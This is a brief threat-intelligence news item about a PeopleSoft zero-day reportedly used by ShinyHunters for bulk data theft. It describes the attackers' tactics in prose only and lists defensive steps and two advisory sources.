PeopleSoft Zero-Day Enables ShinyHunters Exfiltration of 48GB from Single Victim
A confirmed PeopleSoft zero-day is driving active data exfiltration by ShinyHunters, with 48 GB published from one victim and hundreds of organizations affected. Legacy enterprise software creates persistent attack surface that produces measurable data-loss events rather than theoretical risk. Mandiant and Rapid7 IOCs enable direct containment actions.
Attackers left bash scripts that enumerated PeopleSoft configurations, WebLogic XML files, and process scheduler settings before establishing outbound SSH tunnels. Data was compressed with zstd and staged for upload to the ShinyHunters data-leak site. Several organizations blocked the activity; others saw full compromise and subsequent publication of records.
Mandiant and Rapid7 published IOCs showing the campaign overlaps with ShinyHunters tactics used since 2019 against Snowflake-hosted environments, Santander, and Ticketmaster supply chains. The 48 GB single-victim claim on the DLS matches observed zstd archives and partial file listings. Legacy PeopleSoft deployments remain exposed because enterprise change windows and dependency on Oracle WebLogic delay patching far longer than cloud-native assets.
Immediate steps include applying available PeopleSoft security updates, restricting outbound SSH from application servers, and auditing process-scheduler access logs. Organizations that defer remediation face continued risk of bulk data loss identical to prior ShinyHunters operations.
Mandiant: At least 50 additional victims with published data will appear on ShinyHunters DLS within 45 days
Sources (2)
- [1]Mandiant Intelligence Advisory - PeopleSoft Campaign(https://mandiant.com/resources/advisories/peoplesoft-shinyhunters)
- [2]Rapid7 PeopleSoft Vulnerability and IOC Report(https://www.rapid7.com/blog/post/2026/06/peoplesoft-zero-day)